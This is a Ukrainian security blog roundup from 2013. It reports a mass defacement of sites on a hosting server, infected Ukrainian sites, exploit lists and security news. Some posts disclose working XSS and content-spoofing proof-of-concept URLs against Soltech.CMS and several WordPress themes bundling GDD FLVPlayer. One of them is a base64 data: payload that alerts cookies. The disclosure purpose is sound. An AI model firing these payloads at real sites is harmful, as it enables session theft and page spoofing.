Websecurity - Веб безпека

На початку року відбувся масовий взлом сайтів на сервері XServer. Він тривав від 11.01.2013 до 25.07.2013.

Був взломаний сервер української компанії XServer. Взлом складався з декількох невеликих дефейсів та одного крупного дефейсу сайтів. Масовий дефейс відбувся після згаданого десятого масового взлому сайтів на сервері HostPro.

Всього було взломано 67 сайтів на сервері хостера XServer (IP 91.226.213.223). Це наступні сайти: a-xa.com, beru.net.ua, bulgakov.pp.ua, sunlove.pp.ua, fermery.pp.ua, blesk.cn.ua, tni.net.ua, anlider.com.ua, hope.pp.ua, volleyball-cn.pp.ua, nogtigel.org.ua, kravtsov.pp.ua, buhuchet.in.ua, lesha.pp.ua, chso.com.ua, alta-tour.biz, niva.pp.ua, andrlakes.org.ua, ranchoclub.pp.ua, art.geliar.com, atributplus.com, avtolift.com.ua, kyokusinkan.org.ua, fl.cn.ua, lyubava.org.ua, lascala.cn.ua, manific.com, prodvizheniesajta.net.ua, maremi.com.ua, svet-tm.com, mebel4all.com, neruhomist.cn.ua, svetnadom.com.ua, studio-remont.ru, ookna.cn.ua, vseest.net.ua, rusi4i.org.ua, webmoney-cn.com, bmyvg.org.ua, irgt.org.ua, hdvstudio.com.ua, chggme.org.ua, hdvstudio.net.ua, chmyvg.org.ua, imyvg.org.ua, avtolife2012.pp.ua, komyvg.org.ua, nmyvg.org.ua, kreschatik.in.ua, smyvg.org.ua, workofdream.com, desna-buvr.gov.ua, ymadam.com.ua, wp.atributplus.com, wp.mebel4all.com, parnik.com.ua, udesign.net.ua, teplica.com.ua, krmyvg.org.ua, kievkarate.com.ua, avtolife25.pp.ua, cook-info.org.ua, cook-info.cn.ua, upuc.net.ua, www.audiodoctor.com.ua, koryukivka-rada.gov.ua, www.dm-mebel.com. Серед них українські державні сайти koryukivka-rada.gov.ua та desna-buvr.gov.ua.

З зазначених 67 сайтів 61 сайт був взломаний хакером hasnain haxor, 3 сайти хакером Hmei7, 1 сайт хакером ghost-dz, 1 сайт хакером s13doeL та 1 сайт хакером misafir.

Якщо невеликі дефейси по одному сайту явно були зроблені при взломах окремих сайтів, то стосовно одного великого дефейсу hasnain haxor можна сказати, що враховуючи дефейс 61 сайта за один день, немає сумнівів, що вони були взломані через взлом серверу хостінг провайдера. Коли через взлом одного сайта, був отриманий root доступ до сервера (через уразливості в програмному забезпеченні самого сервера) та атаковані інші сайти на даному сервері.

В презентації Mapping Application Security to Business Value, компанія Redspin розповідає про прив’язку безпеки додатків до цінності бізнесу. І наводить роздуми та поради для ІТ і бізнес менеджерів.

Виявлені численні уразливості безпеки в Google Chrome та Chromium.

Уразливі продукти: Google Chrome 28.0, Chromium 28.0.

Численні пошкодження пам’яті, цілочисленні переповнення, витік інформації.

• chromium-browser security update (деталі)

В даній добірці експлоіти в веб додатках:

• Netgear ProSafe - Information Disclosure Vulnerability (деталі)
• Loftek Nexus 543 IP Cameras CSRF Vulnerability (деталі)
• Joomla Media Manager File Upload Vulnerability (деталі)
• Ultra Mini HTTPD Stack Buffer Overflow Vulnerability (деталі)
• MiniWeb (Build 300) Arbitrary File Upload Vulnerability (деталі)

13.07.2013

У травні, 26.05.2013, я знайшов Cross-Site Scripting та Content Spoofing уразливості в Soltech.CMS. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливість в Soltech.CMS.

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам.

27.08.2013

В системі використовується вразлива версія JW Player 4.2.90.

Cross-Site Scripting (WASC-08):

http://site/plugins/flashplayer/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://site/plugins/flashplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Content Spoofing (WASC-12):

http://site/plugins/flashplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/plugins/flashplayer/player.swf?file=1.flv&image=1.jpg
http://site/plugins/flashplayer/player.swf?config=1.xml
http://site/plugins/flashplayer/player.swf?abouttext=Player&aboutlink=http://websecurity.com.ua

Вразливі Soltech.CMS v 0.4 та попередні версії.

У серпні місяці Microsoft випустила 8 патчів. Що більше ніж у липні.

У серпневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 8 бюлетенів по безпеці. Що закривають 23 уразливості в програмних продуктах компанії. Три патчі закривають критичні уразливості та п’ять патчів закривають важливі уразливості.

Дані патчі стосуються всіх поточних операційних систем компанії Microsoft - Windows XP, 2003, Vista, 2008, 7, 2008 R2, 8, 2012, RT. А також Microsoft Internet Explorer і Exchange Server.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://vipnutrition.com.ua - інфекція була виявлена 11.07.2013. Зараз сайт входить до переліку підозрілих.
• http://screenshot.com.ua - інфекція була виявлена 13.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://rurik.at.ua - інфекція була виявлена 29.06.2013. Зараз сайт входить до переліку підозрілих.
• http://ukrdom.biz - інфекція була виявлена 25.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://skd.vn.ua - інфекція була виявлена 21.07.2013. Зараз сайт входить до переліку підозрілих.
• http://web.kharkov.ua - інфекція була виявлена 22.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://irp.lg.ua - інфекція була виявлена 05.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://vb-agro.org.ua - інфекція була виявлена 22.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://vb-derevo.org.ua - інфекція була виявлена 23.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://buznec.com - інфекція була виявлена 29.06.2013. Зараз сайт не входить до переліку підозрілих.

В даній добірці уразливості в веб додатках:

• Foscam <= 11.37.2.48 path traversal vulnerability (деталі)
• Multiple Vulnerabilities in Kasseler CMS (деталі)
• Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability (деталі)
• Project Pier Web Vulnerabilities (деталі)
• Privoxy Proxy Authentication Credential Exposure (деталі)

Сьогодні я виявив Content Spoofing, Cross-Site Scripting та Full path disclosure уразливості в темах для WordPress, що містять GDD FLVPlayer.

Раніше я писав про уразливості в GDD FLVPlayer. Це популярна флешка, що знаходиться на тисячах веб сайтів і яка використовується в багатьох веб додатках.

Цей плеєр міститься в багатьох темах (шаблонах) для WordPress. Серед них I Love It (про дірки в цій темі я вже писав), Megusta, Multipress, Lolzine, V1. Та існують інші уразливі теми для WordPress з gddflvplayer.swf.

XSS (через Flash Injection) (WASC-08):

I Love It:

http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?splashscreen=xss.swf

Megusta:

http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?splashscreen=xss.swf

Multipress:

http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?splashscreen=xss.swf

Lolzine:

http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?splashscreen=xss.swf

V1:

http://site/wp-content/themes/v1/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/v1/flv/gddflvplayer.swf?splashscreen=xss.swf

Full path disclosure (WASC-13):

Всі зазначені теми мають FPD уразливості в php-файлах (в index.php та інших), що типово для WP тем.

http://site/wp-content/themes/iloveit/

http://site/wp-content/themes/megusta/

http://site/wp-content/themes/multipress/

http://site/wp-content/themes/Lolzine/

http://site/wp-content/themes/v1/

В останній темі шлях може бути v1, v1.0, v1.3.5 та інші варіанти.

Наведені XSS та FPD уразливості, приклади 8 СS уразливостей дивитися у вищенаведеному записі. Вразливі веб додатки, що використовують GDD FLVPlayer v3.635 і попередні версії.

Вразливі всі версії наступних веб додатків: I Love It, Megusta, Multipress, Lolzine, V1.

За повідомленням www.xakep.ru, PayPal закрила уразливість, що дозволяла видалити чужий акаунт.

Незалежний фахівець з безпеки Йонут Черніка, розкрив інформацію про серйозну уразливість на сайті платіжної системи PayPal. Донедавна будь-який бажаючий міг видалити чужий акаунт PayPal і створити новий під тим же ім’ям. Зараз уразливість вже виправлена працівниками платіжної системи.

Про дірявий PayPal я вже писав раніше.

За повідомленням ain.ua, за DDoS-атаку на сайт політичної партії киянину загрожує 6 років в’язниці.

Тридцатидвухлітнього киянина будуть судити за DDoS-атаку на сайт однієї з політичних партій. Зокрема, прокуратурою АР Крим був затверджений обвинувальний висновок у карному проваджені по факту блокування роботи сайта регіонального відділення однієї з політичних партій. Безпосередньо мережева атака, що була підкріплена підробкою звертання глави кримського уряду, відбулася під час останніх виборів.

Хоча в заяві прокуратури не фігурує назва політичної партії, не виключено, що мова йде про “Партію Регіонів”. У жовтні 2012 року сайт кримської республіканської організації “Партії регіонів” був взломаний, а пізніше на нього була проведена DDoS-атака.

Це вже третій затриманий DDoS-ер в Україні, про два подібних випадки я писав раніше. Першого затримали в 2009 році, а другого - на початку 2013 року.

За повідомленням www.xakep.ru, шкідливу програму Jekyll провели в каталог AppStore.

Традиційно прийнято вважати, що модерація мобільних додатків для включення в каталог Apple AppStore відбувається дуже ретельно, і провести туди шкідливе ПЗ неможливо. Фахівцям з безпеки з Технологічного інституту Джорджії (США) вдалося довести зворотне. Вони успішно помістили додаток у AppStore і зуміли реалізувати в ньому шкідливу функціональність за допомогою ROP-атаки (атака повернення в бібліотеку, Return Oriented Programming). Грамотно проведена ROP-атака дозволяє обійти захист за допомогою цифрового підпису в AppStore і механізм захисту DEP, що і зробив автор програми Тіелей Ванг.

Про malware в Google Play я вже писав, а зараз черга дійшла до Apple AppStore.